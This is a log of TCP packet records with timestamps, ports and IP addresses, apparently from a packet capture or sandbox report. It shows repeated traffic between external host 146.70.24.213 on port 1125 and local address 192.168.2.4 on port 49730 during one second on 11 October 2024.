Oct 11, 2024 16:53:48.058485985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058507919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058509111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058520079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058526039 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058531046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058554888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058617115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058628082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058638096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058646917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058655977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058660030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058667898 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058671951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058700085 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058754921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058764935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058775902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058785915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058794022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058794975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058806896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058811903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058818102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058829069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058835030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058839083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058850050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058856964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058867931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058877945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058887005 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058887005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058900118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058923960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058923960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058985949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058996916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059005976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059015989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059026003 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059027910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059039116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059051037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059063911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059171915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059181929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059190989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059201002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059211016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059212923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059221029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059231043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059238911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059238911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059251070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059259892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059262037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059273958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059278965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059305906 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059514046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059525013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059535027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059544086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059559107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059576035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059576035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059587002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059596062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059602022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059613943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059621096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059624910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059633017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059637070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059648037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059658051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059664011 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059673071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059684038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059693098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059694052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059705019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059708118 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059714079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059724092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059732914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059736967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059741974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059752941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059761047 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059763908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059773922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059789896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059797049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059808016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.059818983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.059837103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.147583008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147595882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147604942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147654057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147663116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147672892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147708893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147717953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147727966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147738934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147826910 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147844076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147845030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.147856951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147867918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147885084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147892952 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.147895098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147907019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147913933 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.147918940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147929907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147938013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.147939920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147958040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.147974014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.147979975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.147985935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148001909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148022890 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148022890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148036957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148049116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148060083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148068905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148076057 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148076057 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148082972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148108959 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148221016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148268938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148473024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148483992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148494005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148523092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148586988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148597002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148607016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148617983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148627043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148637056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148646116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148655891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148665905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148670912 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148691893 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148711920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148720026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148730993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148768902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148849964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148865938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148874998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148884058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148899078 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148899078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148910046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148920059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148921013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148931026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148940086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148947954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148950100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148962975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148972034 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.148979902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148991108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.148991108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.149002075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149015903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149024963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149027109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.149058104 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.149421930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149432898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149465084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.149472952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149492025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149502993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149524927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.149525881 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149539948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149561882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.149909973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149920940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149931908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149943113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.149947882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.149964094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150026083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150036097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150046110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150057077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150063992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150078058 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150140047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150151014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150161028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150171041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150177002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150182009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150192022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150192976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150207996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150219917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150230885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150233984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150240898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150245905 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150253057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150263071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150280952 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150305986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150774956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150785923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150795937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150814056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150830030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150839090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150849104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150859118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150870085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150888920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150899887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.150962114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150973082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150983095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.150993109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151002884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151014090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151020050 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.151024103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151036024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151048899 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.151051044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151076078 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.151109934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151127100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151137114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151146889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151150942 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.151158094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151170015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151177883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151184082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151192904 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.151204109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151215076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151225090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.151226997 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.151249886 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.151271105 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.239685059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239757061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239793062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239808083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239814043 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.239824057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239839077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239844084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.239852905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239866018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239867926 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.239883900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239900112 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.239905119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239919901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239931107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239940882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.239944935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239959002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239969969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.239970922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239985943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.239995003 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240000010 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240014076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240022898 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240036011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240047932 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240048885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240061998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240073919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240080118 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240087986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240101099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240111113 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240114927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240128040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240138054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240140915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240155935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240164995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240169048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240183115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240190983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240196943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240211964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240220070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240225077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240238905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240247965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240259886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240272999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240276098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240288973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240303040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240305901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240315914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240334988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240344048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240355968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240369081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240379095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.240381956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.240396976 CEST	1125	49730	146.70.24.213	192.168.2.4
